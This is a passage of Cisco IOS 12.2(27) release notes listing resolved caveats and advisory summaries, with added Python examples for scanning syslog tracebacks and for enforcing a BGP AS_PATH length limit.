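from dataclasses import dataclass, field
from typing import List

# Timestamp and "%FACILITY-SEV-MNEMONIC: text" body of one syslog line.
MSG_RE = re.compile(
    r"^(?:\d+:\s+)?[*.]?"                                   # optional "123: " and "*" marks
    r"(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2}(?:\.\d{3})?(?:\s+[A-Z]{3,4})?):\s+"
    r"%(?P<facility>[A-Z0-9_]+)-(?P<sev>\d)-(?P<mnemonic>[A-Z0-9_]+):\s*(?P<text>.*)$"
)
# Program counters that follow "-Traceback=" (8 hex digits each).
TRACEBACK_RE = re.compile(r"-Traceback=\s*(?P<pcs>(?:[0-9A-Fa-f]{8}\s*)+)")


@dataclass
class Finding:
    timestamp: str
    text: str
    traceback: List[str] = field(default_factory=list)


def scan_log(lines):
    """Return one Finding per DATAINCONSISTENCY message, with its traceback attached."""
    findings = []
    current = None          # finding that a following "-Traceback=" line belongs to
    for raw in lines:
        line = raw.rstrip()
        m = MSG_RE.match(line)
        if m:
            current = None  # a new message ends any pending traceback
            if m.group("facility") == "DATACORRUPTION" and m.group("mnemonic") == "DATAINCONSISTENCY":
                text = m.group("text")
                tb = TRACEBACK_RE.search(text)
                current = Finding(m.group("ts"), text[:tb.start()].strip() if tb else text)
                if tb:
                    current.traceback.extend(tb.group("pcs").split())
                findings.append(current)
            continue
        tb = TRACEBACK_RE.search(line)
        if tb and current is not None:
            current.traceback.extend(tb.group("pcs").split())
    return findings


# Constructed sample log; the DATACORRUPTION line mirrors the format quoted in the caveat.
SAMPLE_LOG = """\
May 17 10:01:25.002 UTC: %SYS-5-CONFIG_I: Configured from console by admin on vty0
May 17 10:01:27.815 UTC: %DATACORRUPTION-1-DATAINCONSISTENCY: copy error
-Traceback= 60A1B2C4 60A1B3D8 600F1E20
May 17 10:02:01.100 UTC: %LINK-3-UPDOWN: Interface Serial0/0, changed state to down
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f.timestamp}: {f.text} traceback={' '.join(f.traceback)}")
```

The traceback addresses are what TAC will want alongside the show tech-support output, so keep them in the alert rather than only the message text.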

IBM Connectivity

CSCsf28840

A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.

There are workarounds available for this vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtml

IP Routing Protocols

CSCec71950

Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.

Cisco has made free software available to address this vulnerability for affected customers.

There are workarounds available to mitigate the effects of the vulnerability.

This vulnerability was discovered during internal testing.

This advisory is available at:

http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml

CSCin95836

The Cisco Next Hop Resolution Protocol (NHRP) feature in Cisco IOS contains a vulnerability that can result in a restart of the device or possible remote code execution.

NHRP is a primary component of the Dynamic Multipoint Virtual Private Network (DMVPN) feature.

NHRP can operate in three ways: at the link layer (Layer 2), over Generic Routing Encapsulation (GRE) and multipoint GRE (mGRE) tunnels and directly on IP (IP protocol number 54). This vulnerability affects all three methods of operation.

NHRP is not enabled by default for Cisco IOS.

This vulnerability is addressed by Cisco bug IDs CSCin95836 for non-12.2 mainline releases and CSCsi23231 for 12.2 mainline releases.

This advisory is posted at

http://www.cisco.com/warp/public/707/cisco-sa-20070808-nhrp.shtml.

Miscellaneous

CSCeb21064

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsb11124

The Cisco IOS Stack Group Bidding Protocol (SGBP) feature in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable denial of service condition. Devices that do not support or have not enabled the SGBP protocol are not affected by this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

Cisco has published a Security Advisory on this issue; it is available at http://www.cisco.com/warp/public/707/cisco-sa-20060118-sgbp.shtml

CSCsb12598

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml

Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml

A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsc60249

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsc72722

Symptoms: TCP connections that are opened through a Cisco IOS Firewall (CBAC) may not timeout.

Conditions: With Cisco IOS Firewall (CBAC) enabled, the TCP idle timer for a session may be reset even by TCP packets that fail TCP inspection and are subsequently dropped. This could lead to the TCP session not timing out.

Workaround: There is no workaround.

CSCsd81407

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsd92405

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.

Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml

A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsd95616

Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml.

CSCsf04754

Multiple Cisco products contain either of two authentication vulnerabilities in the Simple Network Management Protocol version 3 (SNMPv3) feature. These vulnerabilities can be exploited when processing a malformed SNMPv3 message. These vulnerabilities could allow the disclosure of network information or may enable an attacker to perform configuration changes to vulnerable devices. The SNMP server is an optional service that is disabled by default. Only SNMPv3 is impacted by these vulnerabilities. Workarounds are available for mitigating the impact of the vulnerabilities described in this document.

The United States Computer Emergency Response Team (US-CERT) has assigned Vulnerability Note VU#878044 to these vulnerabilities.

Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0960 has been assigned to these vulnerabilities.

This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml

CSCsg16908

Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.

The IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the IOS FTP Server service are unaffected by these vulnerabilities.

These vulnerabilities do not apply to the IOS FTP Client feature.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.

CSCsg40567

Symptoms: Malformed SSL packets may cause a router to leak multiple memory blocks.

Conditions: This symptom is observed on a Cisco router that has the ip http secure server command enabled.

Workaround: Disable the ip http secure server command.

CSCsg70474

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsi60004

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCse68138

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

TCP/IP Host-Mode Services

CSCek37177

The Cisco IOS Transmission Control Protocol (TCP) listener in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable memory leak that may lead to a denial of service condition.

This vulnerability only applies to traffic destined to the Cisco IOS device. Traffic transiting the Cisco IOS device will not trigger this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers.

This issue is documented as Cisco bug ID CSCek37177

There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml

CSCse05736

Symptoms: A router that is running RCP can be reloaded by a specific packet.

Conditions: This symptom is seen under the following conditions:

The router must have RCP enabled.

The packet must come from the source address of the designated system configured to send RCP packets to the router.

The packet must have a specific data content.

Workaround: Put access lists at the edge of your network that block RCP packets, to prevent spoofed RSH packets from reaching the router. Use another protocol such as SCP. Use VTY ACLs.

Resolved Caveats—Cisco IOS Release 12.2(27b)

Cisco IOS Release 12.2(27b) is a rebuild release for Cisco IOS Release 12.2(27). The caveats in this section are resolved in Cisco IOS Release 12.2(27b) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

IP Routing Protocols

CSCeh13489

Symptoms: A router may reset its Border Gateway Protocol (BGP) session.

Conditions: This symptom is observed when a Cisco router that peers with other routers receives an Autonomous System (AS) path with a length that is equal to or greater than 255.

Workaround: Configure the bgp maxas-limit command in such a way that the maximum length of the AS path is a value below 255. When the router receives an update with an AS path that exceeds this limit, the prefix is rejected and the event is recorded in the log.
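The workaround works because the AS_PATH segment length on the wire is a single byte, so a path of 255 or more ASes sits at the edge of what the attribute can encode. The following added example (not Cisco code) decodes an AS_PATH attribute value per RFC 4271 and applies a maximum-length policy in the spirit of bgp maxas-limit, rejecting and logging rather than installing over-long or malformed paths; it goes beyond the single case in the caveat by handling multiple segments and AS_SET. The counting rule (each AS_SEQUENCE contributes its member count, each AS_SET counts as one) and the 2-byte ASN encoding are assumptions; Cisco's exact counting is not stated on this page.

```python
"""Decode a BGP AS_PATH attribute value and apply a maximum-AS-path policy.

Added example, not Cisco code. Models the effect of the bgp maxas-limit
workaround: an UPDATE whose AS_PATH is longer than the configured limit is
rejected and logged instead of being installed. Wire format per RFC 4271
with 2-byte ASNs. Assumption: each AS_SEQUENCE contributes its member count
and each AS_SET counts as one (the route-selection rule of RFC 4271).
"""
import struct
from typing import List, Tuple

AS_SET, AS_SEQUENCE = 1, 2

Segment = Tuple[int, List[int]]


def encode_as_path(segments: List[Segment]) -> bytes:
    """Build the attribute value from (segment_type, [asn, ...]) pairs."""
    out = bytearray()
    for seg_type, asns in segments:
        # The segment length field is one byte, so at most 255 ASNs per segment;
        # longer sequences are split into consecutive segments of the same type.
        for i in range(0, len(asns), 255):
            chunk = asns[i:i + 255]
            out += struct.pack("!BB", seg_type, len(chunk))
            out += b"".join(struct.pack("!H", a) for a in chunk)
    return bytes(out)


def decode_as_path(value: bytes) -> List[Segment]:
    """Parse segments, refusing anything truncated or of unknown type."""
    segments: List[Segment] = []
    pos = 0
    while pos < len(value):
        if pos + 2 > len(value):
            raise ValueError("truncated segment header")
        seg_type, count = struct.unpack_from("!BB", value, pos)
        pos += 2
        if seg_type not in (AS_SET, AS_SEQUENCE):
            raise ValueError(f"unknown segment type {seg_type}")
        need = count * 2
        if pos + need > len(value):
            raise ValueError("truncated segment body")
        asns = list(struct.unpack_from(f"!{count}H", value, pos))
        pos += need
        segments.append((seg_type, asns))
    return segments


def as_path_length(segments: List[Segment]) -> int:
    """AS_SEQUENCE counts each member; an AS_SET counts as a single hop."""
    return sum(len(asns) if seg_type == AS_SEQUENCE else 1 for seg_type, asns in segments)


def check_update(value: bytes, maxas_limit: int) -> Tuple[bool, str]:
    """Return (accepted, log message) for the AS_PATH of one UPDATE."""
    try:
        segments = decode_as_path(value)
    except ValueError as err:
        return False, f"malformed AS_PATH rejected: {err}"
    length = as_path_length(segments)
    if length > maxas_limit:
        return False, f"AS_PATH length {length} exceeds maxas-limit {maxas_limit}; prefix rejected"
    return True, f"AS_PATH length {length} within maxas-limit {maxas_limit}"


if __name__ == "__main__":
    # Constructed paths from the private-use ASN range.
    normal = encode_as_path([(AS_SEQUENCE, [64512, 64513, 64514])])
    huge = encode_as_path([(AS_SEQUENCE, list(range(64512, 64512 + 300)))])
    for path in (normal, huge):
        print(check_update(path, 200)[1])
```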

Miscellaneous

CSCei61732

Cisco IOS may permit arbitrary code execution after exploitation of a heap-based buffer overflow vulnerability. Cisco has included additional integrity checks in its software, as further described below, that are intended to reduce the likelihood of arbitrary code execution.

Cisco has made free software available that includes the additional integrity checks for affected customers.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml.

Resolved Caveats—Cisco IOS Release 12.2(27a)

Cisco IOS Release 12.2(27a) is a rebuild release for Cisco IOS Release 12.2(27). The caveats in this section are resolved in Cisco IOS Release 12.2(27a) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

IP Routing Protocols

CSCef60659

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages

2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks

3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.

CSCsa59600

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages

2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks

3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.

Miscellaneous

CSCef44699

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages

2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks

3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.

Resolved Caveats—Cisco IOS Release 12.2(27)

This section describes possibly unexpected behavior by Cisco IOS Release 12.2(27). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(27). This section describes severity 1 and 2 caveats and select severity 3 caveats.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCed86286

Symptoms: A router may reload due to a software-forced crash.

Conditions: This symptom is observed on a Cisco 3745 that runs Cisco IOS Release 12.2(13)T5 and that has SSH configured. However, the symptom may occur on other platforms that run other releases and that do not have SSH configured.

Workaround: There is no workaround.

CSCee20816

Symptoms: A system used for reverse connections, such as a console server or other "milking machine" applications, may unexpectedly restart due to a bus error.

Conditions: The conditions under which this occurs are not well understood, but frequent, short-lived connections are more likely to trigger the problem than environments where connections are either long-lived or rarely opened and closed.

Workaround: There is no workaround.

CSCee35740

Symptoms: After a VIP crashes, a FIB-3-FIBDISABLE error message due to an IPC timeout may occur for all the slots of the VIP.

Conditions: This symptom is observed on a Cisco 7500 series after the VIP crashes and before the VIP recovers. The FIB-3-FIBDISABLE error message is generated for all the slots of the VIP, causing dCEF switching to become disabled.

Workaround: There is no workaround. You can reenable dCEF by entering the clear cef linecard command.

CSCee84611

Symptoms: An NTP broadcast client may fail to synchronize with an NTP broadcast server if the server cannot be reached from the client.

Conditions: This symptom is observed in Cisco IOS interim Release 12.2(12.11)T or a later release, including Release 12.3. However, the symptom may also occur in other releases.

Workaround: Ensure that the server can be reached from the client.

CSCef26714

Symptoms: The Route Switch Module (RSM) fails to boot up and is not listed as a valid module.

Conditions: This symptom happens with Cisco IOS Release 12.2(26) only.

Workaround: Use an older or a newer image than Cisco IOS Release 12.2(26).

CSCef46191

Symptoms: A specifically crafted Transmission Control Protocol (TCP) connection to a telnet or reverse telnet port of a Cisco device running Internetwork Operating System (IOS) may block further telnet, reverse telnet, Remote Shell (RSH), Secure Shell (SSH), and in some cases Hypertext Transport Protocol (HTTP) access to the Cisco device. Telnet, reverse telnet, RSH and SSH sessions established prior to exploitation are not affected.

All other device services will operate normally.

Conditions: A user-initiated, specially crafted TCP connection to a telnet or reverse telnet port blocks further telnet sessions, whereas services such as packet forwarding, routing protocols, and all other communication to and through the device remain unaffected.

Workaround: The detailed advisory is available at http://www.cisco.com/warp/public/707/cisco-sa-20040827-telnet.shtml

Interfaces and Bridging

CSCee44827

Symptoms: Spurious memory accesses may occur on a VIP with a PA-FE.

Conditions: This symptom is observed on a Cisco 7500 series when a raw Ethernet packet is received on the PA-FE interface that is configured as an ISL trunk.

Workaround: There is no workaround.

CSCin58433

Symptoms: The driver code of a third-party vendor Fast Ethernet controller that is part of a C7200-I/O-FE I/O controller may pause indefinitely or reload unexpectedly.

Conditions: This symptom is observed on a Cisco 7200 series when a packet enters the third-party vendor Fast Ethernet controller, when this packet is forwarded to a Multilink PPP (MLP) interface, and when another packet is forwarded by the third-party vendor Fast Ethernet controller before the first packet has left the MLP interface.

Workaround: There is no workaround.

IP Routing Protocols

CSCed53358

Symptoms: Pings fail on an Ethernet-to-VLAN interworking over L2TPv3 due to an IRDP failure.

Conditions: This symptom is observed when you ping between two CE routers. Neither CE router learns the other's MAC address automatically.

Workaround: Ping from the first CE router to the second CE router, then ping from the second CE router to the first CE router.

CSCee32675

Symptoms: It may not be possible to remove a VRF-based static NAT configuration.

Conditions: This symptom is observed on a Cisco platform that runs Cisco IOS Release 12.3 in an MPLS VRF NAT configuration.

Workaround: There is no workaround.

CSCee35125

Symptoms: A Cisco router may crash when you enter the clear ip route * command.

Conditions: This symptom is observed when the routing table has a default route.

Workaround: There is no workaround.

CSCee66936

Symptoms: A software-forced reload may occur on a router that is configured with a DVMRP tunnel.

Conditions: This symptom is observed on a Cisco router when the DVMRP tunnel is brought up and routing information is redistributed between DVMRP and MBGP.

Workaround: There is no workaround.

Miscellaneous

CSCdt59350

Symptoms: X.25 encapsulation may not work on interfaces of a Fast Ethernet network module (NM-xFE2W).

Conditions: This symptom is observed when the NM-xFE2W is installed in a Multicast Address Resolution Server (MARS) platform.

Workaround: There is no workaround.

CSCdz74292

Symptoms: T.38 fax calls from one gateway to another gateway may fail.

Conditions: This symptom is observed when you make a T.38 fax call from an originating gateway (OGW) that is running Cisco IOS Release 12.2(13)T and that is configured for H.323 fast start mode through a gatekeeper to a gateway that is running Cisco IOS Release 12.2(11)T2.

Workaround: Configure the voice service voip global configuration command followed by the h323 call start slow voice-service configuration command on the OGW.

CSCdz84448

Symptoms: When polling the cbQosREDClassStatsTable of the CISCO-CLASS-BASED-QOS-MIB, spurious memory accesses may occur on a Cisco 2600 series, Cisco 3600 series, or Cisco 7200 series. A Cisco 3640 router may also reboot. The spurious memory accesses may be reproduced when polling the above-mentioned table via Simple Network Management Protocol (SNMP).

Conditions: This symptom is observed on a Cisco 2600 series, Cisco 3600 series, and Cisco 7200 series that run Cisco IOS Release 12.2(8)T, Release 12.3, or Release 12.3 T.

Workaround: Prevent the router from answering to queries on the cbQosREDClassStatsTable by implementing the following SNMP view in the router configuration:

snmp-server view qos internet included

snmp-server view qos 1.3.6.1.4.1.9.9.166.1.20.1 excluded

snmp-server community string view qos ro

CSCdz90367

Symptoms: A CPUHOG condition may occur on a router, and the router may reload.

Conditions: This symptom is observed when the router has a large configuration that contains several static crypto map statements and associated crypto access control lists (ACLs).

Workaround: Reduce the size of the configuration, which may help alleviate the CPUHOG condition and reduce the likelihood that the router may reload.

CSCea26450

Symptoms: Under rare circumstances, an Operation, Administration, and Maintenance (OAM)-enabled ATM Permanent Virtual Circuit (PVC) may stay in the down state.

Conditions: This symptom is observed when the ATM interface transitions to the down state and then back to the up state because of a link-related problem or because you enter the shutdown command followed by the no shutdown command.

Workaround: Disable OAM on the PVC.

CSCea87364

Symptoms: Distributed Cisco Express Forwarding (DCEF) may become disabled on a Versatile Interface Processor (VIP) or Cisco 12000 series line card (LC), and the following error message may appear on the console:

%FIB-3-FIBDISABLE: Fatal error, slot 12: Window did not open, LC to RP IPC is non-operational

Conditions: This symptom is observed on a Cisco 7500 series VIP2-50 and VIP4-80 in which ATM OC-3 port adapters such as the PA-A1-OC3 or PA-A3-OC3 are installed when the Cisco 7500 series is upgraded to Cisco IOS Release 12.0(24)S or Release 12.0(24)S1. This symptom is also observed on a Cisco 12000 series LC during significant, prolonged routing table churn.

Workaround: Reload CEF on the VIP or LC by entering the clear cef linecard slot-number EXEC command.

Alternate Workaround: Restart the VIP by performing an online insertion and removal (OIR). Restart the LC by entering the hw-module slot slot-number reload command.

CSCeb01205

Symptoms: A CPUHOG error and a Switch1 bad VCD error with traceback are observed on a router configured as a PE router:

May 5 16:50:22.637: %SYS-3-CPUHOG: Task ran for 2816 msec (348/345), process = Virtual Exec, PC = 600EEA30. -Traceback= 600EEA38 600776C0 60078564 603146F0 602DD204 602DD2BC 602C9FCC 602DCD48 60353F0C 60353EF0

May 5 16:50:32.441: %ATMPA-3-BADVCD: Switch1 bad vcd 3137 packet - 0C418847 00052C3B 00B3DD3B 456B012C 00000000 3B008B0E

Conditions: The %ATMPA-3-BADVCD Switch1 error with traceback is observed when you enter the clear interface sw1 command. The setup has approximately 800 LVCs and 1000 PVCs. The issue is reproducible on platforms that need more than 2 seconds of CPU time to process 100 VCs.

Workaround: There is no workaround.

CSCeb52181

Symptoms: A Cisco platform that accesses the "system:/vfiles/tmstats_ascii" virtual file (for example, via the more system:/vfiles/tmstats_ascii command) may crash because of a bus error.

Conditions: This symptom is observed under normal working conditions, when no configuration changes are made, on a Cisco platform that runs Cisco IOS Release 12.0 S, 12.1 E, 12.2, or 12.3. When the "system:/vfiles/tmstats_ascii" virtual file is not accessed, the symptom does not occur.

Workaround: There is no workaround.

CSCed49294

Symptoms: A Cisco 3600 series with an NM-CT1/E1 network module that contains an NM-xDM network module may not allow incoming modem calls and may generate the "no modem available" error message even though the output of the show modem command indicates that a free modem is available.

Conditions: This symptom is observed when frequent retrains occur on the modems.

Workaround: There is no workaround.

CSCee14926

Symptoms: A PE router that is configured for MPLS may reload because of a freed MPLS adjacency during label imposition on received IP packets.

Conditions: This symptom is observed during label imposition on packets that are received on a PE router that is configured for MPLS.

Workaround: There is no workaround.

CSCee22810

Symptoms: On a Cisco 7500 series, all PVCs may suddenly enter the down state and remain in this state for about two minutes before they come back up. During the DLCI down state, the subinterface does not go down and no notifications are observed in the message log.

